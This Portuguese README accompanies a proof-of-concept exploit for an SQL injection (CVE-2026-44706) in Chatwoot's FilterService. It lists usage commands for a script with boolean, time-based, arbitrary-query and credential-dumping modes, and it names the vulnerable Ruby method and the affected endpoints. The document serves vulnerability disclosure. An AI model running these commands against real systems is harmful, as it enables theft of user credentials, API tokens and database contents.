
Injeção SQL no FilterService do Chatwoot
Um exploit de prova de conceito para o CVE-2026-44706, uma vulnerabilidade de Injeção SQL no FilterService#lt_gt_filter_values do Chatwoot que permite que qualquer agente autenticado leia todo o banco de dados PostgreSQL, incluindo credenciais de usuário e tokens de API. Leia o artigo completo aqui.
Uso:
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
Em app/services/filter_service.rb (linha 91), a entrada do usuário é interpolada diretamente no SQL sem parametrização:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← user input, no sanitization
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← raw interpolation
end
Todos os outros operadores na classe usam parâmetros vinculados (:value_N). Apenas is_greater_than e is_less_than são vulneráveis.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 Injeção SQL. Qualquer agente/admin autenticado pode:
pg_sleep() para exaurir conexões de banco de dados8.8 Alto CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Esta ferramenta é apenas para fins educacionais e de pesquisa. Use-a apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar. O autor não se responsabiliza por qualquer uso indevido ou dano causado por este programa.
QuimeraX Intelligence é uma plataforma avançada de EASM e Inteligência de Ameaças Cibernéticas especializada em identificar vulnerabilidades críticas em sistemas complexos. A plataforma monitora, detecta e alerta proativamente os clientes sobre ameaças de segurança, garantindo transparência e resposta rápida a riscos potenciais. Os clientes recebem notificações imediatas e relatórios abrangentes se seus sistemas forem encontrados vulneráveis, permitindo que tomem medidas de proteção. saiba mais
Hakai Security é uma empresa de cibersegurança fundada por profissionais de segurança, comprometida com a excelência técnica. Oferecemos soluções de segurança personalizadas, incluindo testes de penetração avançados, simulações realistas de Red Team e práticas de desenvolvimento seguro para proteger proativamente os ativos de nossos clientes contra ameaças cibernéticas em evolução.
Hacking Club é a plataforma de treinamento onde você aprende cibersegurança por meio de lições práticas, laboratórios e desafios criados por especialistas que trabalham em nossa empresa de consultoria de segurança: direto do campo de batalha para o seu treinamento. Pratique a vulnerabilidade apresentada neste repositório pelo hacking club! saiba mais